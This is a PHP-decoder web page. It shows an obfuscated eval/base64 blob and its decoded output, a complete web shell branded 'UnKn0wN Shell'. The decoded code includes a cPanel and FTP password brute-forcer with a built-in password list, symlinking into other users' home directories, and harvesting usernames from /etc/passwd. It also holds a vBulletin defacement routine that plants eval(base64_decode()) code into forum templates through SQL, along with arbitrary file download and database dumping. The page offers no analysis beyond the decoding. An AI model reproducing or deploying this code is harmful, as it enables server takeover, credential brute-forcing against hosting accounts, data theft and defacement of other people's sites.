Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval (gzinflate(base64_decode('7b1pWxu50jD8ebgu/oPSwz1tT4zxwk5MwmKICVtslkDI8bTdjd..

Decoded Output download

$head = '<!-- Edited by UnKn0wN -->
<html>
<head>
</script>
<title>o--{ UnKn0wN Shell }--o</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>';
if (isset($_GET['ln'])) {
$fp = fopen('passwd.txt','r');
$fr = fread($fp,filesize('passwd.txt'));
fclose($fp);
preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);

foreach($explode[1] as $user) {
	
	system("ln -s /home/$user/public_html/ $user");
	
}

header("Location: ".$_SERVER['PHP_SELF']);
}
if (isset($_GET['brute'])) {
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<title>/ UnKn0wN@ BruteForcer v1.0 /</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
a:active { outline: none; }
a:focus { -moz-outline-style: none; }
table {
  border: 2px dashed #fff;
  background:#000;
  color: #fff;
  font-weight: bold;
  font-family:"Comic Sans MS";
  }
</style>
  <style type='text/css'>
  <!--
       A:link {text-decoration: none; color:#cccccc }
       A:visited {text-decoration: none; color:#cccccc }
       a:hover {text-decoration: none; color:Red}
  -->
</style>
<?php

@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
$page = $_GET['page'];

if($target == ''){
$target = 'localhost';
}
?>
<?php
 print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
<br><b><center><a href='?brute&page=bio'> bio </a> - <a href='?brute&page=crack'> brute </a> - <a href='?brute&page=users'> grab users </a><br><br></center></td></tr></table>";
 if ( $page == 'bio' ){
print 
"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td><br><center><pre>_____ ___    _             _     _                       
\ ___/ _ \ _| |_ __  _   _| | __| | __ _ _ __   ___ __ _ 
 / _|| (_) |__ | '_ \| | | | |/ _` |/ _` | '_ \ / _ ' _` |
| (__| .__/ _| | |_) | |_| | | | | | | | | |_) | | | | | |
 \____\_\  |__/|_.__/|_.__/|_|_| |_|_| |_|_.__/|_| |_| |_|
   </pre><br><b>###################################<br><font color=Red>/ UnKn0wN@ BruteForcer v1.0 /</font><br><font color=#FFCC00>/ [Edited] by UnKn0wN /</font></b><br>###################################</center></center><br></td></tr></table>";
   exit();
 }elseif( $page == 'crack'){
 
@ini_set('memory_limit', 1000000000000);
$connect_timeout=5;
@set_time_limit(0);
$submit = $_REQUEST['submit'];
$users = $_REQUEST['users'];
$pass = $_REQUEST['passwords'];
$target = $_REQUEST['target'];
$option = $_REQUEST['option'];
if($target == ''){
$target = 'localhost';
}
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
<b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
<tr>
<td align='center'>
<b>Username</b></td>
<td>
<p align='center'>
<b>Password</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>01
012
0123
01234
012345
0123456
01234567
012345678
0123456789
01234567890
123
1234
12345
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
123123
456456
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin
administrator
admincp
cpanel
adminx
admins
password
passwords
passw0rd
passw0rds</textarea><br>
<br>                         
<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel 
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
</td></tr></table></td></tr></form><p align= 'left'>";
?>
<?php
function ftp_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {

print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}

elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
} else {
$link = "ftp://$user:$pass@".$host;
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}

function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { 
print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
if ($host == 'localhost') {
$link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
} else {
$link = "http://$user:$pass@".$host.":2082";
}
print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}

if(isset($submit) && !empty($submit)){

$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
print "<b>[ UnKn0wN@r0ot ]# Attacking ...</font></b><br><br>";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
print "<br><b>[ UnKn0wN@r0ot ]# F!nish3d ...</font></b><br>";
}
exit();
}elseif ( $page == 'users'){
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="grab !"></form>';
$file = $_POST['file'];
$level=0;
if(!file_exists("file:"))
    @mkdir("file:");
@chdir("file:");
$level++;

$hardstyle = @explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            @mkdir($hardstyle[$a]);
        @chdir($hardstyle[$a]);
        $level++;
    }
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result = curl_exec($ch);
echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";

if ($result == FALSE) 
{ die("Failed!"); 
} else { 
if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
foreach($explode[1] as $user) {echo $user."\n";}
} else { echo $result;}
}
echo ' </textarea> </FONT>';
curl_close($ch);
print '</table>';
exit();
}
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
exit();

}
if(isset($_GET['deface'])) {echo $head; echo "

<title>#root@UnKn0wN# | Vbulletin Deface</title>
<style type='text/css'>
.style1 {
	color: #FFFFFF;
}
.style2 {
	font-family: Arial;
	color: #FFFFFF;
}
.style3 {
	text-align: center;
}
.style4 {
	font-family: Arial;
}
</style>

</head>

<center>
<h2 class='style1'>#root@UnKn0wN# | Vbulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
<p align=center class='style1'>&nbsp;</p>	
	<div class='style3'>
		<span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=text name=dbh value=localhost size='15' ></span>
		  <font face='Arial' color='#ffffff'>&nbsp;Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>
          Database User</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>

		<font face='Arial' color='#ffffff'>&nbsp;Database Pass:&nbsp; </font><span class='style1'><input type=text name=dbp size='16' ><br>
          </span>
          </div>
<center class='style1'>
		  <textarea name=index rows='5' cols='33' >echo 'UnKn0wN was Here!';</textarea></center>
<center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body>
</center>
</html>";

$h4cker="[Edited] by UnKn0wN";


if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
{
$dbh = $_POST['dbh'];
$dbn = $_POST['dbn'];
$dbu = $_POST['dbu'];
$dbp = $_POST['dbp'];

$index=str_replace("\'","'",$index);
$set_index  = "{\${eval(base64_decode(\'".base64_encode($index);
//$set_index .= base64_encode("eval ('$index');");
$set_index .= "\'))}}{\${exit()}}";

mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
$fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
$fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($fatal1) or die (mysql_error());
$result2 = mysql_query($fatal2) or die (mysql_error());
$result3 = mysql_query($fatal3) or die (mysql_error());

if ($result && $result2 && $result3) {
echo "Okie";
}
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();}

$language='eng';
$auth = 0;
error_reporting(E_ALL);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = 'UnKn0wN Edition';
$footer = '<div align=center><font face=Verdana size=-2><b>o---{  UnKn0wN Shell }---o</b></font></div>';
if(version_compare(phpversion(), '4.1.0') == -1)
 {
 $_POST   = &$HTTP_POST_VARS;
 $_GET    = &$HTTP_GET_VARS;
 $_SERVER = &$HTTP_SERVER_VARS;
 $_COOKIE = &$HTTP_COOKIE_VARS;
 }
if (@get_magic_quotes_gpc())
 {
 foreach ($_POST as $k=>$v)
  {
  $_POST[$k] = stripslashes($v);
  }
 foreach ($_COOKIE as $k=>$v)
  {
  $_COOKIE[$k] = stripslashes($v);
  }
 }

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
   {
   header('WWW-Authenticate: Basic realm="hCe-GrOuP + UnKn0wN"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b>Contact <a href=http://hcegroup.vn/ </a> : Access Denied</b>");
   }
}

class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    function addFile($data, $name, $time = 0)
    {
        $name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";
        $fr   .= "\x00\x00";
        $fr   .= "\x08\x00";
        $fr   .= $hexdtime;
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);
        $fr      .= pack('V', $c_len);
        $fr      .= pack('V', $unc_len);
        $fr      .= pack('v', strlen($name));
        $fr      .= pack('v', 0);
        $fr      .= $name;
        $fr .= $zdata;
        $this -> datasec[] = $fr;
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        $cdrec .= pack('V', $this -> old_offset );
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }
    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('V', strlen($ctrldir)) .
            pack('V', strlen($data)) .
            "\x00\x00";
    }
}
function compress(&$filename,&$filedump,$compress)
 {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
     {
        $filename  .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
     }
     else if ($compress == 'gzip' && @function_exists('gzencode'))
     {
        $filename  .= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
     }
     else if ($compress == 'zip' && @function_exists('gzcompress'))
     {
     	$filename .= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        $zipfile -> addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile -> file();
     }
     else
     {
     	$mime_type = 'application/octet-stream';
     }
 }
function mailattach($to,$from,$subj,$attach)
 {
 $headers  = "From: $from\r\n";
 $headers .= "MIME-Version: 1.0\r\n";
 $headers .= "Content-Type: ".$attach['type'];
 $headers .= "; name=\"".$attach['name']."\"\r\n";
 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 if(@mail($to,$subj,"",$headers)) { return 1; }
 return 0;
 }
class my_sql
 {
 var $host = 'localhost';
 var $port = '';
 var $user = '';
 var $pass = '';
 var $base = '';
 var $db   = '';
 var $connection;
 var $res;
 var $error;
 var $rows;
 var $columns;
 var $num_rows;
 var $num_fields;
 var $dump;

 function connect()
  {
  	switch($this->db)
     {
  	 case 'MySQL':
  	  if(empty($this->port)) { $this->port = '3306'; }
  	  if(!function_exists('mysql_connect')) return 0;
  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  	  if(is_resource($this->connection)) return 1;
  	 break;
     case 'MSSQL':
      if(empty($this->port)) { $this->port = '1433'; }
  	  if(!function_exists('mssql_connect')) return 0;
  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
      if($this->connection) return 1;
     break;
     case 'PostgreSQL':
      if(empty($this->port)) { $this->port = '5432'; }
      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
      if(!function_exists('pg_connect')) return 0;
      $this->connection = @pg_connect($str);
      if(is_resource($this->connection)) return 1;
     break;
     case 'Oracle':
      if(!function_exists('ocilogon')) return 0;
      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
      if(is_resource($this->connection)) return 1;
     break;
     }
    return 0;
  }

 function select_db()
  {
   switch($this->db)
    {
  	case 'MySQL':
  	 if(@mysql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'MSSQL':
  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'PostgreSQL':
     return 1;
    break;
    case 'Oracle':
     return 1;
    break;
    }
   return 0;
  }

 function query($query)
  {
   $this->res=$this->error='';
   switch($this->db)
    {
  	case 'MySQL':
     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
      {
      $this->error = @mysql_error($this->connection);
      return 0;
      }
     else if(is_resource($this->res)) { return 1; }
     return 2;
  	break;
    case 'MSSQL':
     if(false===($this->res=@mssql_query($query,$this->connection)))
      {
      $this->error = 'Query error';
      return 0;
      }
      else if(@mssql_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'PostgreSQL':
     if(false===($this->res=@pg_query($this->connection,$query)))
      {
      $this->error = @pg_last_error($this->connection);
      return 0;
      }
      else if(@pg_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'Oracle':
     if(false===($this->res=@ociparse($this->connection,$query)))
      {
      $this->error = 'Query parse error';
      }
     else
      {
      if(@ociexecute($this->res))
       {
       if(@ocirowcount($this->res) != 0) return 2;
       return 1;
       }
      $error = @ocierror();
      $this->error=$error['message'];
      }
    break;
    }
  return 0;
  }
 function get_result()
  {
   $this->rows=array();
   $this->columns=array();
   $this->num_rows=$this->num_fields=0;
   switch($this->db)
    {
  	case 'MySQL':
  	 $this->num_rows=@mysql_num_rows($this->res);
  	 $this->num_fields=@mysql_num_fields($this->res);
  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  	 @mysql_free_result($this->res);
  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'MSSQL':
  	 $this->num_rows=@mssql_num_rows($this->res);
  	 $this->num_fields=@mssql_num_fields($this->res);
  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  	 @mssql_free_result($this->res);
  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
    break;
    case 'PostgreSQL':
  	 $this->num_rows=@pg_num_rows($this->res);
  	 $this->num_fields=@pg_num_fields($this->res);
  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  	 @pg_free_result($this->res);
  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'Oracle':
     $this->num_fields=@ocinumcols($this->res);
     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
     @ocifreestatement($this->res);
     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    }
   return 0;
  }
 function dump($table)
  {
   if(empty($table)) return 0;
   $this->dump=array();
   $this->dump[0] = '##';
   $this->dump[1] = '## --------------------------------------- ';
   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
   $this->dump[3] = '## Database: '.$this->base;
   $this->dump[4] = '##    Table: '.$table;
   $this->dump[5] = '## --------------------------------------- ';
   switch($this->db)
    {
  	case 'MySQL':
  	 $this->dump[0] = '## MySQL dump';
  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  	 if(!$this->get_result()) return 0;
  	 $this->dump[] = $this->rows[0]['Create Table'];
     $this->dump[] = '## --------------------------------------- ';
  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  	 if(!$this->get_result()) return 0;
  	 for($i=0;$i<$this->num_rows;$i++)
  	  {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  	  }
    break;
    case 'MSSQL':
     $this->dump[0] = '## MSSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
  	 if(!$this->get_result()) return 0;
  	 for($i=0;$i<$this->num_rows;$i++)
  	  {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  	  }
    break;
    case 'PostgreSQL':
     $this->dump[0] = '## PostgreSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
  	 if(!$this->get_result()) return 0;
  	 for($i=0;$i<$this->num_rows;$i++)
  	  {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  	  }
    break;
    case 'Oracle':
      $this->dump[0] = '## ORACLE dump';
      $this->dump[]  = '## under construction';
    break;
    default:
     return 0;
    break;
    }
   return 1;
  }
 function close()
  {
   switch($this->db)
    {
  	case 'MySQL':
  	 @mysql_close($this->connection);
    break;
    case 'MSSQL':
     @mssql_close($this->connection);
    break;
    case 'PostgreSQL':
     @pg_close($this->connection);
    break;
    case 'Oracle':
     @oci_close($this->connection);
    break;
    }
  }
 function affected_rows()
  {
   switch($this->db)
    {
  	case 'MySQL':
  	 return @mysql_affected_rows($this->res);
    break;
    case 'MSSQL':
     return @mssql_affected_rows($this->res);
    break;
    case 'PostgreSQL':
     return @pg_affected_rows($this->res);
    break;
    case 'Oracle':
     return @ocirowcount($this->res);
    break;
    default:
     return 0;
    break;
    }
  }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 {
  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  else
   {
    @ob_clean();
    $filename = @basename($_POST['d_name']);
    $filedump = @fread($file,@filesize($_POST['d_name']));
    fclose($file);
    $content_encoding=$mime_type='';
    compress($filename,$filedump,$_POST['compress']);
    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
    header("Content-type: ".$mime_type);
    header("Content-disposition: attachment; filename=\"".$filename."\";");
    echo $filedump;
    exit();
   }
 }
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }


if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
 {
 echo $head;
 $sql = new my_sql();
 $sql->db   = $_POST['db'];
 $sql->host = $_POST['db_server'];
 $sql->port = $_POST['db_port'];
 $sql->user = $_POST['mysql_l'];
 $sql->pass = $_POST['mysql_p'];
 $sql->base = $_POST['mysql_db'];
 $querys = @explode(';',$_POST['db_query']);
 echo '<body bgcolor=Black>';
 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't connect to SQL server</b></font></div>";
  else
   {
   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't select database</b></font></div>";
   else
    {
    foreach($querys as $num=>$query)
     {
      if(strlen($query)>5)
      {
      echo "<font face=Verdana size=-2 color=#DF0000><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
      switch($sql->query($query))
       {
       case '0':
       echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
       break;
       case '1':
       if($sql->get_result())
        {
       	echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
       	$keys = @implode("&nbsp;</b></font></td><td class=main><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
        echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
        for($i=0;$i<$sql->num_rows;$i++)
         {
         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
         $values = @implode("&nbsp;</font></td><td class=main><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
         echo '<tr><td class=main><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
         }
        echo "</table>";
        }
       break;
       case '2':
       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
       echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
       break;
       }
      }
     }
    }
    echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
    echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
    echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
    $query_db = mysql_query("SHOW DATABASES;");
    while ($query_db_row = mysql_fetch_array($query_db))
    {
    	echo $query_db_row[0]."\n";
    }
    echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
    if (($_POST['mysql_db']) && $sql->select_db())
    {
     $query_tables = mysql_query("SHOW TABLES;");
     while ($query_tables_row = mysql_fetch_array($query_tables))
     {
     	echo $query_tables_row[0]."\n";
     }
    }
